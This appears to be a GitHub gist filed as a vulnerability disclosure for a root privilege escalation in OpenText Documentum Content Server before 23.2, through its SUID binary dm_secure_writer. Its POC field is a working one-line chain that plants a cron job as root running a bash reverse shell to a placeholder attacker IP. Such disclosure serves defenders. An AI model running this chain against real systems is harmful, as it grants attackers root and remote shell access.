Skip to content

Instantly share code, notes, and snippets.

@picar0jsu
Created May 18, 2023 15:48
Show Gist options
  • Save picar0jsu/a8e623639da34f36202ce5e436668de7 to your computer and use it in GitHub Desktop.
Save picar0jsu/a8e623639da34f36202ce5e436668de7 to your computer and use it in GitHub Desktop.
OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation
[Suggested description]
OpenText Documentum Content Server before 23.2 has a flaw that allows
for privilege escalation from a non-privileged Documentum user to root.
The software comes prepackaged with a root owned SUID binary
dm_secure_writer. The binary has security controls in place preventing
creation of a file in a non-owned directory, or as the root user.
However, these controls can be carefully bypassed to allow for an
arbitrary file write as root.
------------------------------------------
[Vulnerability Type]
Local Privilege Escalation via SetUID Binary
------------------------------------------
[Vendor of Product]
OpenText
------------------------------------------
[Affected Product Code Base]
Documentum Content Server - Before 23.2, Fixed in 23.2.
------------------------------------------
[Affected Component]
The affected SUID is dm_secure_writer.
------------------------------------------
[Attack Type]
Local
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Attack Vectors]
Local access as the Documentum Content Server user to the machine with the affected software.
------------------------------------------
[Reference]
https://www.opentext.com/about/security-acknowledgements
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[POC]
ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" | /tmp/secure_writer test -1 /etc/cron.d/evilcron
------------------------------------------
[Discoverer]
@picar0jsu
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment